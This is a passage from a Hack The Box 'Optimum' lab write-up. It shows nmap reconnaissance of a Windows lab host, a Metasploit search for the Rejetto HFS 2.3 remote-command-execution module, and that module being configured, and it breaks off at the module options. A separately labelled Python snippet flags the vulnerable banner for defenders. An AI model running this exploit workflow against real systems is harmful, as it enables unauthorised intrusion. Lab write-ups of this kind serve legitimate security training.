HTB Optimum [Hack The Box HTB lab] writeup series 6

This is the sixth machine in the HTB retired machine series.

Contents

0x00 Machine overview

0x01 Information gathering

Port scan

Application enumeration

0x02 Get a webshell

0x03 Privilege escalation

Searching msf for a privilege-escalation module

Running systeminfo

Running windows-exploit-suggester.py

Running ms16-098


0x00 Machine overview

As shown, this target is a Windows machine with difficulty rated Easy.

0x01 Information gathering

Port scan

root@kali:~# nmap -T5 -A -v 10.10.10.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-04 00:43 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 00:43
Completed NSE at 00:43, 0.00s elapsed
Initiating NSE at 00:43
Completed NSE at 00:43, 0.00s elapsed
Initiating NSE at 00:43
Completed NSE at 00:43, 0.00s elapsed
Initiating Ping Scan at 00:43
Scanning 10.10.10.8 [4 ports]
Completed Ping Scan at 00:43, 0.55s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:43
Completed Parallel DNS resolution of 1 host. at 00:43, 0.27s elapsed
Initiating SYN Stealth Scan at 00:43
Scanning 10.10.10.8 [1000 ports]
Discovered open port 80/tcp on 10.10.10.8
Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 12.03% done; ETC: 00:44 (0:01:13 remaining)
Increasing send delay for 10.10.10.8 from 0 to 5 due to 11 out of 21 dropped probes since last increase.
SYN Stealth Scan Timing: About 18.87% done; ETC: 00:46 (0:02:52 remaining)
SYN Stealth Scan Timing: About 24.80% done; ETC: 00:48 (0:03:32 remaining)
SYN Stealth Scan Timing: About 50.07% done; ETC: 00:49 (0:03:15 remaining)
SYN Stealth Scan Timing: About 56.67% done; ETC: 00:50 (0:02:55 remaining)
SYN Stealth Scan Timing: About 62.60% done; ETC: 00:50 (0:02:35 remaining)
SYN Stealth Scan Timing: About 68.80% done; ETC: 00:50 (0:02:12 remaining)
SYN Stealth Scan Timing: About 74.67% done; ETC: 00:50 (0:01:49 remaining)
SYN Stealth Scan Timing: About 80.63% done; ETC: 00:50 (0:01:25 remaining)
SYN Stealth Scan Timing: About 86.60% done; ETC: 00:50 (0:00:59 remaining)
SYN Stealth Scan Timing: About 92.57% done; ETC: 00:50 (0:00:33 remaining)
Completed SYN Stealth Scan at 00:50, 451.02s elapsed (1000 total ports)
Initiating Service scan at 00:50
Scanning 1 service on 10.10.10.8
Completed Service scan at 00:50, 7.08s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 10.10.10.8
Retrying OS detection (try #2) against 10.10.10.8
Initiating Traceroute at 00:51
Completed Traceroute at 00:51, 0.35s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 00:51
Completed Parallel DNS resolution of 2 hosts. at 00:51, 0.27s elapsed
NSE: Script scanning 10.10.10.8.
Initiating NSE at 00:51
Completed NSE at 00:51, 8.54s elapsed
Initiating NSE at 00:51
Completed NSE at 00:51, 2.41s elapsed
Initiating NSE at 00:51
Completed NSE at 00:51, 0.00s elapsed
Nmap scan report for 10.10.10.8
Host is up (0.33s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (90%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows Server 2012 or Windows Server 2012 R2 (90%), Microsoft Windows Server 2012 R2 (90%), Microsoft Windows Server 2012 (89%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.010 days (since Tue Feb  4 00:37:15 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   339.56 ms 10.10.14.1
2   341.07 ms 10.10.10.8

NSE: Script Post-scanning.
Initiating NSE at 00:51
Completed NSE at 00:51, 0.00s elapsed
Initiating NSE at 00:51
Completed NSE at 00:51, 0.00s elapsed
Initiating NSE at 00:51
Completed NSE at 00:51, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 486.38 seconds
           Raw packets sent: 3354 (152.624KB) | Rcvd: 384 (26.969KB)

Only a single port, 80, is open.
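From the defender's side, the same scan output is an inventory: the banner that gives the attacker a Metasploit module is the banner an asset owner should be alerting on. The following is an added example (not from the original post) that parses the PORT/STATE/SERVICE/VERSION table and NSE script fields from the nmap output above and flags the HFS 2.3 banner; the watchlist entry and the excerpt of scan output are constructed here.

```python
import re

# Constructed excerpt of the nmap output shown above (not a live scan).
NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.8
Host is up (0.33s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: HFS 2.3
|_http-title: HFS /
"""

# "80/tcp open  http    HttpFileServer httpd 2.3" -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# "|_http-server-header: HFS 2.3" -> NSE script name and value (continuation lines are skipped)
SCRIPT_RE = re.compile(r"^\|_?\s*([\w-]+):\s*(.*)$")

# Banner patterns a defender treats as actionable. HFS 2.3 is listed because the
# post shows a public Metasploit module (rejetto_hfs_exec) targeting it.
WATCHLIST = [
    (re.compile(r"HFS 2\.3|HttpFileServer httpd 2\.3"),
     "Rejetto HttpFileServer 2.3: public RCE module exists; upgrade or decommission"),
]

def parse_nmap(text):
    """Return open-port records from nmap normal output, with NSE fields attached."""
    services = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, name, version = m.groups()
            services.append({"port": int(port), "proto": proto, "state": state,
                             "service": name, "version": version.strip(), "scripts": {}})
            continue
        s = SCRIPT_RE.match(line)
        if s and services:  # script output belongs to the most recent port line
            services[-1]["scripts"][s.group(1)] = s.group(2).strip()
    return services

def flag_services(services):
    """Return (port, note) for every open service whose banners match the watchlist."""
    findings = []
    for svc in services:
        if svc["state"] != "open":
            continue
        banner = " ".join([svc["version"]] + list(svc["scripts"].values()))
        for pattern, note in WATCHLIST:
            if pattern.search(banner):
                findings.append((svc["port"], note))
                break
    return findings
```

Running `flag_services(parse_nmap(NMAP_OUTPUT))` on the excerpt returns one finding for port 80.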

Application enumeration

Open the home page and take a look:

The home page already tells us which application is running: HFS v2.3.

So we search directly for a known vulnerability:

msf5 exploit(windows/http/rejetto_hfs_exec) > search hfs

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/multi/http/git_client_command_exec  2014-12-18       excellent  No     Malicious Git and Mercurial HTTP Server For CVE-2014-9390
   1  exploit/windows/http/rejetto_hfs_exec       2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution


There is indeed a usable exploit module for it.

0x02 Get a webshell

After setting the relevant parameters, run the exploit module:

msf5 exploit(windows/http/rejetto_hfs_exec) > show options 

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.8       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          